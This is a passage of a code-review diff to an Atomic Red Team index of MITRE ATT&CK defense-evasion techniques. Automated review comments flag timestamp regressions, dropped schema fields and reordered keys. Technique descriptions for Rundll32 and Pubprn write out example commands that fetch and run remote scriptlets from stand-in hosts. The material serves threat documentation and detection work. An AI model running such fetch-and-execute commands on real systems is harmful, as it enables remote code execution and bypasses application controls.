| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 601423ff20..5a9259f93b 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
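Review bot: The `modified` timestamp for this entry moves backwards, from '2022-04-25T14:00:00.188Z' to '2020-11-10T18:29:31.004Z', and the same regression appears further down for Revert Cloud Instance ('2022-04-25T14:00:00.188Z' to '2021-03-08T10:33:02.128Z'). A regenerated index should not make an object older than it was. The old 14:00:00.188Z values look like a batch stamp and the new ones like genuine STIX modified dates, so if this PR switches the upstream bundle the generator reads, say so in the PR description; if not, check which bundle is being consumed before merging.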
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
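Review bot: Dropping `x_mitre_attack_spec_version: 2.1.0` for T1055.011 is inconsistent with the rest of the file, where only `spec_version: '2.1'` is removed and `x_mitre_attack_spec_version` is kept on every other entry, including ones still at 2.1.0 (Socket Filters directly below and Pubprn later in the diff). Either the generator should keep the key here too, or the PR should state why this object alone loses it.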
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
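Review bot: The citation keys introduced into the description, `(Citation: Akami Frog4Shell 2024)` and `(Citation: Sysdig Fileless Malware 23022)`, read like typos (Akamai; 2022) but they are upstream ATT&CK `source_name` keys and must match the `external_references` entries exactly, so they should be left as generated and not hand-corrected in this file. The substantive change for defenders is the new Linux scope: `/dev/shm`, `/run/shm`, `/var/run` and `/var/lock` are named as RAM-backed locations that read-only root filesystems do not protect, so any file-integrity or execution-from-tmpfs rule that consumes this index should be checked against that list.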
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
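Review bot: This hunk removes `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the entire `external_references` list for T1556.003, only for the following hunk to re-add the same values in a different key order, with the references also reordered (PAM Creds now precedes Red Hat PAM). Nothing changes semantically beyond `modified` and the version fields, so the generator is emitting keys in whatever order the source bundle uses. Sorting keys, or preserving the existing order, in the generator would reduce a 90-line diff to the handful of lines that actually changed and make future reviews of this file tractable.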
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
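Review bot: `x_mitre_permissions_required: root` is removed along with `spec_version` and `x_mitre_attack_spec_version: 2.1.0`, and nothing in the re-added block replaces it, so the index no longer records that modifying PAM modules requires root. Given the entry now declares spec 3.2.0 and gains `revoked: false` and `x_mitre_deprecated: false`, this is an upstream schema change rather than a generator bug, but it is the one field in the hunk a consumer of the index might filter on, so call it out in the PR description.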
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
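Review bot: the new T1666 object lands with `x_mitre_detection: ''` and `atomic_tests: []`, although its own description names the observable (the `CreateAccount` call and the organization-leaving API call described just above it) and its data source is `Cloud Service: Cloud Service Modification`; a one-line detection note pointing at those management-API events would keep the rendered entry from being blank. It also omits the `identifier:` line that sibling objects such as T1564.008 carry before `atomic_tests`, so check which shape the generator's schema actually intends.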
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
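Review bot: replacing `Office 365` and `Google Workspace` with the single `Office Suite` platform in T1564.008 (and bumping the version to 1.4) changes the platform vocabulary that any per-platform filtering or index generation keys on; make sure every consumer of `x_mitre_platforms` recognises the new string, otherwise this technique silently drops out of the mail-platform views it used to appear in.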
@@ -950,7 +1037,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests:
- name: New-Inbox Rule to Hide E-mail in M365
@@ -1006,7 +1092,7 @@ defense-evasion:
elevation_required: false
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1077,11 +1163,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
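Review bot: `modified` for T1014 moves backwards here (2023-05-09 to 2023-03-30), and the same regression appears for T1036.007, T1548.002, T1548.003, T1600, T1562.009, T1542.005, T1070.002, T1218.004, T1218.013, T1218.007, T1553.001 and T1222.001 elsewhere in this patch; a timestamp going backwards usually means the value is now taken from a different field (for example the upstream STIX object's own `modified` rather than the previous sync time). Confirm that is intentional and that nothing downstream treats `modified` as monotonic for change detection.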
@@ -1149,7 +1234,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1180,7 +1264,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1217,13 +1301,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
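Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted from T1036.007 without a replacement, whereas other objects in this patch either keep the field or are bumped to 3.2.0 (T1578, T1036.005, T1574.011); an object with the field missing will be treated as older than any versioned one, so consider emitting the current spec version uniformly. Dropping `spec_version: '2.1'` on its own is done consistently across the patch and is fine.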
@@ -1324,7 +1406,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1355,7 +1436,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1389,13 +1470,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1447,12 +1526,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
